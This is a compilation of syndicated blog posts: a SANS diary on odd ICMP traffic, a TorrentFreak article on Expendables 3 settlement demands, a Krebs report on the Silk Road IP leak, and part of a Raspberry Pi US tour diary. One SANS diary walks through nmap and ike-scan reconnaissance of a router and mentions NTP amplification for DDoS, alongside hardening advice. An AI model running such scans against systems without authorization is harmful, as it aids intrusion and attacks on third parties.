SANS Internet Storm Center, InfoCON: green: Strange ICMP traffic seen in destination, (Sat, Sep 20th)

This post was syndicated from: SANS Internet Storm Center, InfoCON: green and was written by: SANS Internet Storm Center, InfoCON: green. Original post: at SANS Internet Storm Center, InfoCON: green

Reader Ronnie provided us today a packet capture with a very interesting situation:

  1. Several packets are arriving, all ICMP echo request from unrelated address:
    ICMP sources
  2. All ICMP packets being sent to the destination address does not have data, leaving the packet with the 20 bytes for the IP header and 8 bytes for the ICMP echo request without data
    ICMP data
  3. All the unrelated address sent 6 packets: One with normal TTL and 5 with incremental TTL:
    6 ICMP packets for each destination

Seems to be those packets are trying to map a route, but in a very particular way. Since there are many unrelated IP addresses trying to do the same, maybe something is trying to map routes to specific address to do something not good. The destination IP address is an ADSL client.

Is anyone else seeing these kind of packets? If you do, we definitely want to hear from you. Let us know!

Manuel Humberto Santander Peláez
SANS Internet Storm Center – Handler
e-mail: msantand at isc dot sans dot org

(c) SANS Internet Storm Center. Creative Commons Attribution-Noncommercial 3.0 United States License.

TorrentFreak: Expendables 3 Downloaders Told To Pay Up – Or Else

This post was syndicated from: TorrentFreak and was written by: Andy. Original post: at TorrentFreak

Back in July a pretty much pristine copy of The Expendables 3 leaked online. It was a dramatic event for those behind the production as the movie’s premier on BitTorrent networks trumped its theatrical debut by several weeks.

Distributor Lionsgate was quick to react. Just days after the leak the entertainment company sued several file-sharing sites, which eventually resulted in the closure of file-hosting site Hulkfile. But more action was yet to come.

Doubling up on their efforts, Lionsgate also targeted hosting providers, domain registrars and seedboxes while at the same time sending thousands of DMCA takedown notices to have content and links to content removed.

However, a big question remained unanswered. Would the makers of The Expendables 3 start tracking down alleged file-sharers to force them into cash settlements as happened with previous iterations of the movie? It’s taken a few weeks but confirmation is now in.

Millennium Films, the production company behind The Expendables 3, is now shaking down individual Internet users they believe to have downloaded and shared the leaked movie without permission. What do they want? Hard cash, of course.

Interestingly, and at least for now, the company isn’t going through the courts filing subpoenas against ISPs to obtain downloaders’ personal details. In a switch of tactics the company is sending DMCA takedown notices to ISPs via CEG TEK International and requesting that the notices are forwarded to the customers in question instead. In addition to the usual cease and desist terminology, Millennium tag on cash settlements demands too.

Expendables 3-notice

As can be seen in the image above, the production company is giving notice recipients until October 5, 2014 to come up with the money – or else.

“If within the prescribed time period described above you fail to (i) respond or settle, or (ii) provide by email to written evidence of your having consent or permission from Millennium Films to use the Work in connection with Peer-to-Peer networks (note that fraudulent submissions may give rise to additional liabilities), the above matter may be referred to attorneys representing the Work’s owner for legal action,” the settlement offer reads.

Of course, whether people fill in CEG TEK’s settlement form or write to them with their personal details, the end result will be the same. The company will now have the person’s identity, something they didn’t previously have since at this stage ISPs have only forwarded the notices.

While the notices are real (CEG TEK have confirmed the action) little is known about how much money Millenium/CEG TEK are demanding to make a supposed lawsuit go away. However, TorrentFreak has learned that CEG TEK are simultaneously sending out settlement demands to alleged downloaders of The Expendables 2. A copy of the settlement page demand – $300 – is shown below.


While some people will no doubt be worrying about how to deal with these demands and whether Millenium will follow through on its implied threat to sue, at least some of these notices will be falling on deaf ears. LiquidVPN, an anonymity company listed in our 2014 report, received one such notice but as a no-log provider, could not forward it to its customer.

Compare that to the despair of a user posting on KickassTorrents who got caught after relying on IP address blocking software (typos etc corrected).

“I woke up to this alongside four other notices from my ISP. I stopped downloading six days ago, but I’m receiving old notices about movies that were downloaded a month ago and I basically can’t do nothing about it since its old. I use PeerBlock and it’s a bunch of bullshit. What should I do with this October 5 deadline on a settlement? Please help!” he wrote.

Finally, and as Lionsgate, Millennium Films and CEG TEK shake down sites, hosting services, domain registrars, seedbox providers and now end users, the big mystery surrounding the most important questions remain unanswered.

Who – at Lionsgate, Millennium or one of its partners – had full access to a clean DVD copy of the movie? Who then put that copy in a position of being placed online? The FBI, who can crack the most complex of terrorist crimes, are reportedly involved and must’ve asked these questions. Yet the culprit still hasn’t been found……

Could it be that studios become less cooperative when blame falls too close to home?

Source: TorrentFreak, for the latest info on copyright, file-sharing and anonymous VPN services.

Krebs on Security: Dread Pirate Sunk By Leaky CAPTCHA

This post was syndicated from: Krebs on Security and was written by: BrianKrebs. Original post: at Krebs on Security

Ever since October 2013, when the FBI took down the online black market and drug bazaar known as the Silk Road, privacy activists and security experts have traded conspiracy theories about how the U.S. government managed to discover the geographic location of the Silk Road Web servers. Those systems were supposed to be obscured behind the anonymity service Tor, but as court documents released Friday explain, that wasn’t entirely true: Turns out, the login page for the Silk Road employed an anti-abuse CAPTCHA service that pulled content from the open Internet, thus leaking the site’s true location.

leakyshipTor helps users disguise their identity by bouncing their traffic between different Tor servers, and by encrypting that traffic at every hop along the way. The Silk Road, like many sites that host illicit activity, relied on a feature of Tor known as “hidden services.” This feature allows anyone to offer a Web server without revealing the true Internet address to the site’s users.

That is, if you do it correctly, which involves making sure you aren’t mixing content from the regular open Internet into the fabric of a site protected by Tor. But according to federal investigators,  Ross W. Ulbricht — a.k.a. the “Dread Pirate Roberts” and the 30-year-old arrested last year and charged with running the Silk Road — made this exact mistake.

As explained in the Tor how-to, in order for the Internet address of a computer to be fully hidden on Tor, the applications running on the computer must be properly configured for that purpose. Otherwise, the computer’s true Internet address may “leak” through the traffic sent from the computer.


And this is how the feds say they located the Silk Road servers:

“The IP address leak we discovered came from the Silk Road user login interface. Upon examining the individual packets of data being sent back from the website, we noticed that the headers of some of the packets reflected a certain IP address not associated with any known Tor node as the source of the packets. This IP address (the “Subject IP Address”) was the only non-Tor source IP address reflected in the traffic we examined.”

“The Subject IP Address caught our attention because, if a hidden service is properly configured to work on Tor, the source IP address of traffic sent from the hidden service should appear as the IP address of a Tor node, as opposed to the true IP address of the hidden service, which Tor is designed to conceal. When I typed the Subject IP Address into an ordinary (non-Tor) web browser, a part of the Silk Road login screen (the CAPTCHA prompt) appeared. Based on my training and experience, this indicated that the Subject IP Address was the IP address of the SR Server, and that it was ‘leaking’ from the SR Server because the computer code underlying the login interface was not properly configured at the time to work on Tor.”

For many Tor fans and advocates, The Dread Pirate Roberts’ goof will no doubt be labeled a noob mistake — and perhaps it was. But as I’ve said time and again, staying anonymous online is hard work, even for those of us who are relatively experienced at it. It’s so difficult, in fact, that even hardened cybercrooks eventually slip up in important and often fateful ways (that is, if someone or something was around at the time to keep a record of it).

A copy of the government’s declaration on how it located the Silk Road servers is here (PDF). A hat tip to Nicholas Weaver for the heads up about this filing.

A snapshop of offerings on the Silk Road.

A snapshop of offerings on the Silk Road.

SANS Internet Storm Center, InfoCON: green: Identifying Firewalls from the Outside-In. Or, “There’s Gold in them thar UDP ports!”, (Thu, Sep 4th)

This post was syndicated from: SANS Internet Storm Center, InfoCON: green and was written by: SANS Internet Storm Center, InfoCON: green. Original post: at SANS Internet Storm Center, InfoCON: green

In a penetration test, often the key to bypassing a security control is as simple as knowing identifying the platform it’s implemented on.  In other words, it’s a lot easier to get past something if you know what it is.  For instance, quite often you’ll be probing a set of perimeter addresses, and if there are no vulnerable hosts NAT-ed out for you, you might start feeling like you’re at a dead end.   Knowing what those hosts are would be really helpful right about now.  So, what to do next?

Look at UDP, that’s what.  Quite often scanning the entire UDP range will simply burn hours or days with not a lot to show for it, but if you target your scans carefully, you can quite often get some good information in a hurry.

Scanning NTP is a great start.  Way too many folks don’t realize that when you make a network device (a router or switch for instance) an NTP client, quite often you also make it an NTP server as well, and NTP servers love to tell you all about themselves.  All too often that port is left open because nobody knows to block it.  

Another service that quite often bypasses all firewall ACLs is the corporate remote access IPSEC VPN specifically IKE/ISAKMP (udp/500).  Even if this is a branch firewall with a site-to-site VPN to head office, often IKE is misconfigured to bypass the interface ACL, or the VPN to head office is enabled with a blanket “any any” permit for IKE.

Let’s take a look at these two sevices – we’ll let’s use NMAP to dig a little deeper.  First, let’s scan for those ports:

nmap -Pn -sU -p123,500 –open x.x.x.x
Starting Nmap 6.46 ( ) at 2014-08-29 12:13 Eastern Daylight Time

Nmap scan report for (x.x.x.x)
Host is up (0.070s latency).
123/udp open  ntp
500/udp open  isakmp

Nmap done: 1 IP address (1 host up) scanned in 46.69 seconds

OK, so we found open UDP ports – how does this help us?  Let’s run the SECOND set of scans against these two ports, starting with expanding the NMAP scan to use the ntp-info script:

C: > nmap -Pn -sU -p123 –open x.x.x.x –script=ntp-info.nse

Starting Nmap 6.46 ( ) at 2014-08-29 12:37 Eastern Daylight Time

Nmap scan report for (x.x.x.x)
Host is up (0.042s latency).
123/udp open  ntp
| ntp-info:
|   receive time stamp: 2014-08-29T16:38:51
|   version: 4
|   processor: unknown
|   system: UNIX
|   leap: 0
|   stratum: 4
|   precision: -27
|   rootdelay: 43.767
|   rootdispersion: 135.150
|   peer: 37146
|   refid:
|   reftime: 0xD7AB23A5.12F4E3CA
|   poll: 10
|   clock: 0xD7AB2B15.EA066B43
|   state: 4
|   offset: 11.828
|   frequency: 53.070
|   jitter: 1.207
|   noise: 6.862
|_  stability: 0.244

Nmap done: 1 IP address (1 host up) scanned in 48.91 seconds

Oops – ntp-info not only tells more about our host, it also discloses the NTP server that it’s syncing to – in this case check that host IP in red – that’s an internal host.  In my books, that can be rephrased as “the next target host”, or maybe if not next, at least on the list “for later”.  Interestingly, support for ntp-info requests positions this host nicely to act as an NTP reflector/amplifier, which can then be used in DDOS spoofing attacks.  The send/receive ration is just under 1:7 (54 bytes sent, 370 received), so not great, but that’s still a 7x amplification which you can spoof.

Back to the pentest – ntp-info gives us some good info, it doesn’t specifically tell us what OS our target host is running, so let’s take a look at IKE next, with service detection enabled:

C: > nmap -Pn -sU -p500 -sV –open x.x.x.x

Starting Nmap 6.46 ( ) at 2014-08-29 13:10 Eastern Daylight Time

Nmap scan report for (x.x.x.x)
Host is up (0.010s latency).
500/udp open  isakmp
Service Info: OS: IOS 12.3/12.4; CPE: cpe:/o:cisco:ios:12.3-12.4

Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 159.05 seconds

Ah – very nice!  Nmap correctly tells us that this device is a Cisco Router (not an ASA or any other device)

The ike-scan utility should give us some additional IKE info, let’s try that with a few different options:

A basic verbose assess (main mode) gives us nothing:

C: > ike-scan -v x.x.x.x
DEBUG: pkt len=336 bytes, bandwidth=56000 bps, int=52000 us
Starting ike-scan 1.9 with 1 hosts (
x.x.x.x    Notify message 14 (NO-PROPOSAL-CHOSEN) HDR=(CKY-R=ea1b111d68fbcc7d)

Ending ike-scan 1.9: 1 hosts scanned in 0.041 seconds (24.39 hosts/sec).  0 returned handshake; 1 returned notify

Ditto, main mode IKEv2:

C: > ike-scan -v -2 x.x.x.x
DEBUG: pkt len=296 bytes, bandwidth=56000 bps, int=46285 us
Starting ike-scan 1.9 with 1 hosts (
—     Pass 1 of 3 completed
—     Pass 2 of 3 completed
—     Pass 3 of 3 completed

Ending ike-scan 1.9: 1 hosts scanned in 2.432 seconds (0.41 hosts/sec).  0 returned handshake; 0 returned notify

with just nat-t, still nothing:

C: > ike-scan -v -nat-t x.x.x.x
DEBUG: pkt len=336 bytes, bandwidth=56000 bps, int=52000 us
Starting ike-scan 1.9 with 1 hosts (
x.x.x.x    Notify message 14 (NO-PROPOSAL-CHOSEN) HDR=(CKY-R=ea1b111d8198ef48)

Ending ike-scan 1.9: 1 hosts scanned in 0.038 seconds (26.32 hosts/sec).  0 returned handshake; 1 returned notify

Aggressive mode however is a winner-winnner-chicken-dinner!

C: > ike-scan -v -A x.x.x.x
DEBUG: pkt len=356 bytes, bandwidth=56000 bps, int=54857 us
Starting ike-scan 1.9 with 1 hosts (
x.x.x.x    Aggressive Mode Handshake returned HDR=(CKY-R=ea1b111d4f1622a2)
SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=2
8800) VID=12f5f28c457168a9702d9fe274cc0100 (Cisco Unity) VID=afcad71368a1f1c96b8
696fc77570100 (Dead Peer Detection v1.0) VID=1fdcb6004f1722a231f9e4f59b27b857 VI
D=09002689dfd6b712 (XAUTH) KeyExchange(128 bytes) ID(Type=ID_IPV4_ADDR, Value=x.x.x.x) Nonce(20 bytes) Hash(20 bytes)

Ending ike-scan 1.9: 1 hosts scanned in 0.068 seconds (14.71 hosts/sec).  1 returned handshake; 0 returned notify

We see from this that the remote office router (this is what this device is)  is configured for aggressive mode and XAUTH – so in other words, there’s likely a userid and password along with the preshared key to authenticate the tunnel.  Note that ike-scan identifies this host as “Cisco unity”, so while it gives us some new information, for basic device identification, in this case NMAP gave us better info.

What should you do to prevent scans like this and the exploits based on them?  The ACL on your perimeter interface might currently end with a “deny tcp any any log” – consider adding on “deny udp any any log”, or better yet, replace it with “deny ip any any log”.  Permit *exactly* what you need, deny everything else, and just as important – LOG everything that gets denied.  Logging most of what is permitted also is also a good idea – if you’ve ever had to troubleshoot a problem or backtrack a security incident without logs, you are likely already doing this.

Adding a few honeypots into the mix is also a nice touch.  Denying ICMP will often defeat scripts or cursory scans.  Many network devices can be configured to detect scans and “shun” the scanning host – test this first though, you don’t want to block production traffic by accident with an active control like this.

Have you found something neat in what most might otherwise consider a common and relatively “secure” protocol?  Please, use our diary to share your story !

Rob VandenBrink

(c) SANS Internet Storm Center. Creative Commons Attribution-Noncommercial 3.0 United States License.

Raspberry Pi: Ben’s Mega USA Tour

This post was syndicated from: Raspberry Pi and was written by: Ben Nuttall. Original post: at Raspberry Pi

Last month we put out a blog post advertising that I would be doing a tour of America, with a rough initial route, and we welcomed requests for visits.


Over the next couple of weeks I was overwhelmed with visit requests – I plotted all the locations on a map and created a route aiming to reach as many as possible. This meant covering some distance in the South East before heading back up to follow the route west towards Utah. I prepared a set of slides based on my EuroPython talk, and evolved the deck each day according to the reception, as well as making alterations for the type of audience.

With launching the Education Fund, being in Berlin for a week for EuroPython followed by YRS week and a weekend in Plymouth, I’d barely had time to plan the logistics of the trip – much to the annoyance of our office manager Emma, who had to book me a one-way hire car with very specific pick-up and drop-off locations (trickier than you’d think), and an internal flight back from Salt Lake City. I packed a suitcase of t-shirts for me to wear (wardrobe by Pimoroni) and another suitcase full of 40 brand new Raspberry Pis (B+, naturally) to give away. As I departed for the airport, Emma and Dave stuck a huge Raspberry Pi sticker on my suitcase.


When checking in my suitcase the woman on the desk asked what the Raspberry was, and her colleague explained it to her! In the airport I signed in to the free wifi with one of my aliases, Edward Snowden. I started to think Phil McKracken or Mr. Spock might have been a better choice once I spotted a few security guards seemingly crowding around in my proximity…

Mon 4 – NYC, New York

I managed to board the flight without a federal investigation (although I may now be on the list, if I wasn’t already), and got chatting to the 60 year old Texan lady I was seated with, who hadn’t heard about Raspberry Pi until she managed to land a seat next to me for 8 hours. I had her convinced before we left the ground. I don’t know how he does it, but Richard Branson makes 8 hours on a tin can in the sky feel like heaven. Virgin Atlantic is great!

Upon landing at JFK I was subjected to two hours’ queuing (it was nice of them to welcome us with traditional British pastimes), followed by a half-hour wait to get through customs. I felt I ought to declare that I was bringing forty computers in to the country (also stating they were to be given away), and was asked to explain what they were, show one to the officer who took hold of one of the copies of Carrie Anne‘s book, Adventures in Raspberry Pi, to validate my explanation. Fortunately I was not required to participate in a pop quiz on Python indentation, GPIO, Turtle graphics and Minecraft, as he took my word for it and let me through. I was then given the chance to queue yet again – this time about 45 minutes for a taxi to Manhattan. I arrived at Sam‘s house much later than I’d anticipated much she was there to greet me by hanging her head out the window and shouting “MORNING BEN”. An in-joke from a time we both lived in Manchester.

We ate and met my friend-from-the-internet Aidan, we went to a bar until what was 5am on my body clock. A sensible approach, I thought, was to just stay up and then get up at a normal time the next day. I awoke and saw the time was 6.00 – my jetlagged and exhausted mind decided it was more likely to be 6pm than 6am, but it was wrong. I arose and confirmed a meeting time and place for my first visit – just a few blocks away from Sam’s apartment in Manhattan.

Tue 5 – NYC, New York

I met Cameron and Jason who had set up a summer class teaching a computing course for locals aged 18-and-under for 2 weeks, delivered purely on Raspberry Pis! I chatted with them before the students arrived, and they told me about how they set up the non-profit organisation STEMLadder, and that they were letting the students take the Pis home at the end of the course. Today’s class was on using Python with Minecraft – using some material they found online, including a resource I helped put together with Carrie Anne for our resources section.

I gave an introduction about the Raspberry Pi Foundation and showed some example projects and then the kids did the Python exercises while working on their own “side projects” (building cool stuff while the course leaders weren’t looking)!


Thanks to Cameron and Jason for taking the opportunity to provide a free course for young people. A perfect example use for Raspberry Pi!

Wed 6 – Washington, DC

On Wednesday morning I collected my hire car (a mighty Nissan Altima) and set off for Washington, DC! I’ve only been driving for less than a year so getting in a big American car and the prospect of using the streets of Manhattan to warm up seemed rather daunting to me! I had a GPS device which alleviated some of my concern – and I headed South (yes, on the wrong right side of the road).


I’d arranged to meet Jackie at 18F – a digital services agency project in the US government General Services Administration. This came about when I met Matt from Twilio at EuroPython, who’d done a similar tour (over 5 months). After a 6 hour drive including horrendous traffic around Washington (during which I spotted a sign saying “NSA – next right – exployees only“, making me chuckle), I arrived and entered 18F’s HQ (at 1800 F Street) where I had to go through security as it was an official government building. I was warned by Jackie by email that the people I’d be meeting would be wearing suits but I need not worry and wear what I pleased – so I proudly wore shorts and a green Raspberry Pi t-shirt. I met with some of the team and discussed some of their work. 18F was set up to replicate some of the recent initiatives of the UK government, such as open data, open source projects and use of GitHub for transparency. They also work on projects dealing with emergency situations, such as use of smartphones to direct people to sources of aid during a disaster, and using Raspberry Pis to provide an emergency communication system.

We then left 18F for the DC Python / Django District user group, where I gave a talk on interesting Python projects on Raspberry Pi. The talk was well received and I took some great questions from the audience. I stayed the night in Washington and decided to use the morning to walk round the monuments before leaving for North Carolina. I walked by the White House, the Washington Monument and the Lincoln Memorial and took some awkward selfies:


Thu 7 – Raleigh, North Carolina

I left DC and it took me 6 hours to get to North Carolina. I arrived at the University (NCSU) in Raleigh just in time for the event – Code in the Classroom - hosted at the Hunt library and organised by Elliot from Trinket. I set my laptop up while Eliot introduced the event and began my talk. There was a good crowd of about 60 people – from around age 7 to 70!


The talk went down well, and I received many questions about teaching styles, classroom management and the future of the hardware. One older chap, who has been running a summer coding club on the Pi shouted out: “Where were you two weeks ago when I needed you!?” when I answered one of his questions, which generated laughter from the audience. I also had a teacher approach me after the talk asking if she could take a selfie with me to show her students she’d met someone from Raspberry Pi – I happily obliged and showed her some of my awkward selfies from Washington, DC. She asked if we could take an awkward one too – needless to say, I happily obliged!


Elliot had arranged a room next door to the lecture theatre with some Pis set up for kids to play on. I gave out some Pis to the kids and it was well over an hour before the last of them were dragged home by their parents. I chatted with Elliot and the others about them setting up a regular event in Raleigh – as there was obviously huge demand for Pi amongst kids and adults in the area and beyond (I’d heard someone had driven up from Florida to attend the talk!) – and so I look forward to hearing about the Raleigh Raspberry Jam soon! A few of us went out to get pizza, and we were accompanied by one of the smartest kids I’ve ever met – and among interesting and inspiring conversation, he kept asking me seemingly innocent questions like “what do you call that thing at the back of your car?” to which I’d reply with the British word he wanted me to speak! (It’s a boot.)


Here’s a video of the talk:

I thanked Elliot and departed for Greensboro, where I’d arranged to stay with my friend Rob from my university canoe club, and his wife Kendra.

Fri 8 – Charlotte, North Carolina

In the morning I left for UNC Charlotte where I spoke to embeddable systems engineering students at EPIC (Energy Production Infrastructure Centre). There was a good crowd of about 60 students and a few members of staff. When I entered the room they were playing Matt Timmons-Brown’s YouTube videos – what a warm-up act!


Following the talk I chatted with students about their projects, answered some questions, deferred some technical questions to Gordon and Alex, and was taken out to a brilliant craft beer bar for a beer and burger with some of the staff.


In the evening Rob, Kendra and I went out to eat – we had a beer in a book shop and ate bacon (out of a jam jar) dipped in chocolate. True story. We also took some group awkward selfies:


Sat 9 – Pigeon River, Tennessee

The Saturday I’d assigned to be a day off – I hoped to go kayaking with Rob but he had to work and Kendra was busy so Rob put me in touch with some paddling friends who welcomed me to join them on a trip to the Pigeon River in Tennessee! An early start of 6am left me snoozing in the back of the car, which Matt took the chance to snap a picture of and post it to Facebook (I only found out when Rob mentioned it later that evening). We had a nice couple of runs of the river by kayak, accompanied by a rafting party. And another awkward selfie.


Sun 10 – Lawrenceville, Georgia

On Sunday morning I left Rob and Kendra’s for Georgia. One of the requests I’d had was from a man called Jerry who just wanted to meet me if I was passing by. I said it’d be great if he could set up a public meeting to be more inclusive – and he got back in touch with a meetup link for an event at Geekspace Gwinnett – a community centre and hackspace in Lawrenceville. I pulled up, shook hands with Jerry and was shown to the front of the room to connect up my laptop. There was a larger crowd than I’d imagined, seeing as Jerry had set the event up just a few days prior to this – but there were about 40 people there, who were all very interested in Raspberry Pi and after my talk we had a great discussion of everyone’s personal projects.


Liz, who runs marketing for the space, gave me a tour, and Joe, the guy setting up the AV for my presentation spotted the Adventure Time stickers on my laptop and told me he worked for Turner in Atlanta who broadcast Cartoon Network, and offered to give me a tour of the network when he went on his night shift that evening. I went to Jerry’s house where he and his wife cooked for me and he showed me Pi Plates, the extension board he’s been working on.


I then left to meet Liz and her husband, Steve, who has been working on a huge robotics project – a whole wearable suit (like armour) that’s powered by a Pi and will make sounds and be scary! I look forward to the finished product. They also have an arcade machine Steve built years ago (pre-Pi) which houses a PC and which, he claims, had basically every arcade game ever on it.



Did you know there was a Michael Jackson game for the Sega Mega Drive, where you have to perform dance moves to save the children? Neither did I

We set off for Atlanta at about 11.30pm and I witnessed its beautiful skyline, which is well lit up at night. We arrived at Turner and met Joe, who gave us the tour – I’ve never seen so many screens in my life. They show all the broadcast material for TV and web on screens and have people sit and watch them to ensure the integrity of the material and ensure the advertising rules are adhered to. We also saw the Cartoon Network floor of the office side of the building where staff there work on the merchandise for shows like Adventure Time!



Joe also showed us the Turner Makers room – a mini hackspace for the Turner staff to work on side projects – he told me of one which used a Raspberry Pi to control steps that would light up and play a musical note as you walked across them. They’re currently working on a large games arcade BMO with a normal PC size screen as a display – I look forward to seeing it in action when it’s finished.


It’s great to see the space has since set up their own monthly Raspberry Pi group!

Mon 11 – Chattanooga, Tennessee

I then left Georgia to return to Tennessee, where I’d arranged to visit Red Bank Middle School in Chattanooga. I arrived at the school, signed in to get my visitor’s badge and met Kimberly Elbakidze - better known to her students as Dr. E – who greeted me with a large Subway sandwich. I ate in the canteen and while chatting with some of the staff I noticed the uniformed security guard patrolling the room had a gun on his belt. Apparently this is normal in American schools.

It was the first day back at the school, so the children were being oriented in their new classes. I gave two short talks, introducing the Raspberry Pi and what you can do with it – to sixth and eighth graders, and opened for some questions:

“Do you like Dr. Who?”
“Is that your real accent?”
“Are you really from England?”
“Can I get a picture with you?”
“Can I keep Babbage?”



I wrapped up, left them a copy of Carrie Anne’s book and some Pis, and went on my way. I’d intended to get online and confirm the details of my next school visit (I’d arranged the date with the teacher, but we hadn’t settled on the time or what we were doing), but access to the internet from the school was restricted to staff so I couldn’t get on. I had to set off for Alabama, and only had the school name and the town. I put the town name in to my car’s GPS and set off.

Tue 12 – Talladega, Alabama

I arrived in Talladega town centre unsure how close I was to the school. I parked up and wandered down the main street in magnificent sunshine and intense heat looking for a McDonald’s or Starbucks, hoping to get on some WiFi to check where it was. With no luck, I headed back to the car and decided to just find a hotel and hope that I was at least nearby. I asked someone sitting outside a shop if they knew of the school – RL Young Elementary School – and they said it was just 15 minutes or so away, so I asked for a nearby hotel and she pointed me in the right direction. As I neared the car, the intense heat turned in to a terrific storm – the 5 minute drive to the hotel was in the worst rain I’ve ever seen.


I checked in to the hotel and got on with my emails – I sent one to the teacher who’d requested me at the school to say I’d arrived in Talladega, that I was staying in the Holiday Inn, and asked what time I should come in. My hotel phone rang 5 minutes later – it was the husband of the teacher. Trey said the principal hadn’t been told about the visit yet, and the details needed to be confirmed with her before we set a time – but they would sort it out as soon as possible and let me know. He offered to take me out for a meal that night so I arranged to meet him within an hour. Just as I was leaving I got an email from someone called Andrew who said he’d just spotted I was in Talladega, and asked if I could meet him if I had time – I said if he could get to the restaurant, I’d be there for the next couple of hours.

As I arrived I met them both, and introduced them to each other. Driving through that afternoon I’d noticed the town has about 50 churches. Trey said he recognised Andrew’s surname, and Andrew said his father was the priest of one of the churches, and Trey said he knew him. Andrew was also training to become a priest like his Dad, and Trey said he’d skipped Bible school that night to come and meet me. We had a nice meal and a chat and Trey said he’d let me know in the morning what the plans for the school visit were. Andrew offered to take me out for breakfast and show me around the town. I said I’d contact him in the morning once I’d heard the timings from Trey.

Once I woke up the next morning my email told me I needed to be at the school for about 1pm, so I had time to go to breakfast with Andrew, and he showed me around the place. I also visited his home and his church and met his family. He showed me some Raspberry Pi projects he’s been working on too.


He also offered to help out at the school – RL Young Elementary, so we got my kit and he drove us over. We signed in at reception where we entered our names in to a computer which printed visitor labels (seriously – a whole PC for that – and another just showing pictures of dogs! The Raspberry Pi was definitely needed in this place).


I was to follow a woman from the Red Cross, who gave a talk to the children about the importance of changing their socks every day. I thought an introduction to programming with Minecraft might blow their smelly socks right off!

The principal attempted to introduce me but had no idea who I was or why I was there, so just let me get on with it. I spoke to the young children and introduced the Raspberry Pi, focusing on a Minecraft demo at the end where I let them have a go themselves. The principal thanked me, said it was interesting and wished me a safe trip back to Australia! I left them some Pis and a copy of Adventures in Raspberry Pi.

Wed 13 – Somerville, Tennessee

I’d arranged my next visit with a very enthusiastic teacher called Terri Reeves from the Fayette Academy (a high school) in Somerville, Tennessee. In her original request she’d said she wasn’t really on my route, but would be willing to travel to meet me for some training – but I explained I’d changed my route to try to hit as many requests as I could, so I’d be happy to visit the school. She offered to let me stay at her house, and told me her husband would cook up some Southern Barbecue for me on arrival. It was quite a long drive and I arrived just after sunset – the whole family was sitting around the table ready to eat and I was welcomed to join them. I enjoyed the Southern Barbecue and was treated to some Razzleberry Pie for dessert. I played a few rounds of severely energetic ping pong with each of Terri’s incredibly athletic sons and daughters before getting to bed.

I spent most of the day at the school, where I gave my Raspberry Pi talk and demo to each of Terri’s classes. Again, it was the first week back for the school so it was just orientation for students settling in to their classes and new routines. The information went down well across the board and Terri said lots of students wanted to do Raspberry Pi in the after-school classes too.

This is what the Raspberry Pi website looks like in the school, as Vimeo is blocked

This is what the Raspberry Pi website looks like in the school, as Vimeo is blocked

I joined some students for lunch, who quizzed me on my English vocabulary and understanding of American ways – they thought it was hilarious when I pointed out they said “Y’all” too much. I suggested they replace it with “dawg”. I do hope this lives on.





I also took a look at a project Terri had been trying to make in her free period – she’d been following some (really bad) instructions for setting up a webcam stream from a Pi. I diagnosed the problem fairly quickly – the apt-get install motion command she’d typed had failed as the site containing the .deb ( was blocked on the school network (for no good reason!) – I asked if we could get it unblocked and the network administrator came over and unblocked it. She originally only wanted to unlock it for the Pi’s IP address but I explained it would mean no-one could install things or update their Pis without access to that website, so she unlocked it from the system. I tried again and there were no further problems so we proceeded to the next steps.

I then drove about an hour West to Downtown Memphis where I spent the early evening between Elvis Presley Boulevard and Beale Street (no sign of a Clive museum, just a row of Harley Davidsons) where I bought a new hat, which soon became the talk of the office.


My new hat

My new hat


When I returned to Terri’s house she asked me to help her with webcam project again – I checked she’d done all the steps and tried opening the stream from VLC Player on my laptop. I’ve never heard anyone shriek with joy so loud when she saw the webcam picture of us on that screen! Terri was overjoyed I’d managed to help her get that far.

Thu 14 – Louisville, Kentucky

I left the next morning for Louisville (pronounced Lou-er-vul), and en route I realised I’d started to lose my voice. I arrived in the afternoon for an event at FirstBuild, a community hackspace run by General Electric. The event opened with an introduction and a few words from me, and then people just came to ask me questions and show me their projects while others were shown around the space and introduced to the equipment.



Check out this great write-up of the FirstBuild event: Louisville, a stop on US tour for credit-card sized computers.

We then proceeded to the LVL1 hackerspace where I was given a tour before people arrived for my talk. By this point my voice had got quite bad, and unfortunately there was no microphone available and the room was a large echoey space. However I asked people to save questions to the end and did my best to project my voice. I answered a number of great questions and got to see some interesting projects afterwards.





Fri 15 – St. Louis, Missouri

Next – St. Louis (pronounced Saint Lewis), Missouri – the home of Chuck Berry. I had a full day planned by teacher and tinkerer Drew McAllister from St. John Vianney High School. He’d arranged for me to meet people at the Grand Center Arts Academy at noon, then go to his school to speak to a class and the after school tech club followed by a talk at a hackspace in the evening.

I was stuck in traffic, and didn’t make it to the GCAA meetup in time to meet with them, so we headed straight to the school where I gave a talk to some very smartly dressed high school students, which was broadcast to the web via Google Hangouts. Several people told me afterwards how bad my voice sounded on the Hangout. Here it is:

I had a few minutes’ rest before moving next door to the server room, where they host the after school tech club – Drew kindly filled in the introduction of the Pi to begin (to save my voice) and asked students if they knew what each of the parts of the Pi were for. I continued from there and showed examples of cool projects I thought they’d like. I gave Drew some Pis for the club and donated some Adafruit vouchers gifted by James Mitchell – as I thought they’d use them well.

photo 1
photo 2
photo 3

Drew showed me around St. Louis and took me out for a meal (I consumed lots of hot tea for my throat) before we went to the Arch Reactor hackerspace. I gave my talk and answered a lot of questions before being given a tour of the space.



Throat sweet selfie



Sat 16 – Colombia, Missouri

In the morning I left in the direction of Denver, which was a journey long enough to have to break up over two days. With no visit requests in Kansas City, but one in Colombia, which was on my way but not very far away, I stopped there to meet with a group called MOREnet, who provide internet connection and technical support to schools and universities. Rather than have me give a talk, they just organised a sit-down chat and asked me questions about education, teacher training and interesting ways of learning with Raspberry Pi. Some of the chat was video recorded which you can watch at (please excuse my voice).


I even got to try Google Cardboard – a simple virtual reality headset made with cardboard and an Android phone. A very nice piece of kit! I stayed a couple of hours and made my way West. I’d asked around for a good place to stay that night on my way to Denver. Some people had suggested Hays in Kansas so I set that as my destination. It had taken me 2 hours to get to Columbia and would be another 6+ hours to Hays, so it was always going to be a long day, but at least I was in no rush to arrive anywhere for a talk or event.

Kansas City Selfie

Kansas City Selfie

I stopped briefly in Kansas City (actually in the state of Missouri, not Kansas) to find almost nobody out and almost everything closed. I think it’s more of a nightlife town. I finally arrived in Hays at 8.30pm after the boring drive through Kansas and checked in to a hotel just in time for a quick dip in the swimming pool.


Sun 17 – Denver, Colorado

